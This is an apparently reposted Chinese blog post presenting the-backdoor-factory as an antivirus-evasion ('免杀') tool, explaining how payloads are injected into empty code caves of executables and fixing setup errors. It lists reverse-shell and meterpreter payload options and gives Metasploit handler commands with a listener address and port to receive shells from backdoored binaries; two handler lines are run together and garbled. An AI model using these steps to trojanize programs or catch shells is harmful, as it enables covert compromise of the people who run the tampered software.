0day几时有,把酒问青天。祝大家中秋快乐~
/*
本文参考至亮神的工具介绍-the-backdoor-factory
https://github.com/Micropoor/Micro8
将复现中一些小坑填满
*/
原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp到代码段,来触发payload。
【第一个坑】
backdoor-factory 在kali linux里面是自带的,但是在我们运行的时候就会不知道什么原因报错
解决的方法是重新从官网git clone一次
git clone https://github.com/secretsquirrel/the-backdoor-factory
【第二个坑】
缺少库
apt-get install python-capstone
此时就可以正常运行了
·cave_miner_inline
·iat_reverse_tcp_inline
·iat_reverse_tcp_inline_threaded
·iat_reverse_tcp_stager_threaded
·iat_user_supplied_shellcode_threaded
·meterpreter_reverse_https_threaded
·reverse_shell_tcp_inline
·reverse_tcp_stager_threaded
·user_supplied_shellcode_threaded
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp
use exploit/multi/handlerset payload windows/meterpreter/reverse_https
接下来就是设置msf 等待上线了
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.135
set lport 4444
exploit
本文始发于微信公众号(零组攻防实验室):【免杀利器】the-backdoor-factory
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论